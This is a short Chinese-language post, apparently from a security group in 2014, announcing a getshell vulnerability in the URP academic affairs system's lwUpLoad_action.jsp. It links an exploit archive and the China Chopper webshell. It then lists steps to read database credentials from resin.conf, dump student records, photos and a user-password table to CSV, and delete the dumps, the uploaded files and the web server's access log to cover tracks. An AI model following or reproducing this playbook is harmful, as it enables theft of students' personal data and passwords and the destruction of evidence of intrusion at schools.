URP综合教务系统通杀getshell

  • 2014-09-14
  • 0

本来在习科沙龙的时候,准备要放出这个0day,但是考虑到影响范围实在是太大了,所以为了慎重起见,我们打消了放出漏洞的念头。当看到wooyun既然已经有人发现了存在问题的地方,那么习科联创以技术研究为目的,经讨论决定,在wooyun没有公开处理漏洞之前,只对赏金猎人部分开放作为学习和研究的样本,也请广大赏金猎人自觉遵守习科联创的规章制度,请勿非法使用。
存在漏洞的文件为lwUpLoad_action.jsp,此漏洞发现者为习科联创核心成员zippo。
利用工具仅限赏金猎人使用,当wooyun将此事处理完毕后,我们会同步放出利用程序。

 

 

urp_upload.rar

然后resin下的conf里有个resin.conf,搜索database
/URP/webserver/resin-jw6/conf/ 

SELECT * FROM xs_xjb  –f:/tmp/xs_xjb.csv

SELECT * FROM code_jsb  –f:/tmp/code_jsb.csv

SELECT * FROM code_bjb  –f:/tmp/code_bjb.csv

SELECT * FROM code_zyfxb  –f:/tmp/code_zyfxb.csv

SELECT * FROM code_zyb  –f:/tmp/code_zyb.csv

SELECT * FROM code_xsb  –f:/tmp/code_xsb.csv

SELECT * FROM sys_yhmmb  –f:/tmp/sys_yhmmb.csv

SELECT * FROM xs_zpb  –f:/tmp/xs_zpb.csv

中国菜刀.zip

SELECT * FROM xs_xjb_view  –f:/tmp/xs_xjb_view.csv

rm /tmp/*.csv

rm /program/xfzzhjw/lwUpLoadTemp/*

rm /resin-3.0.27-2/logs/access.log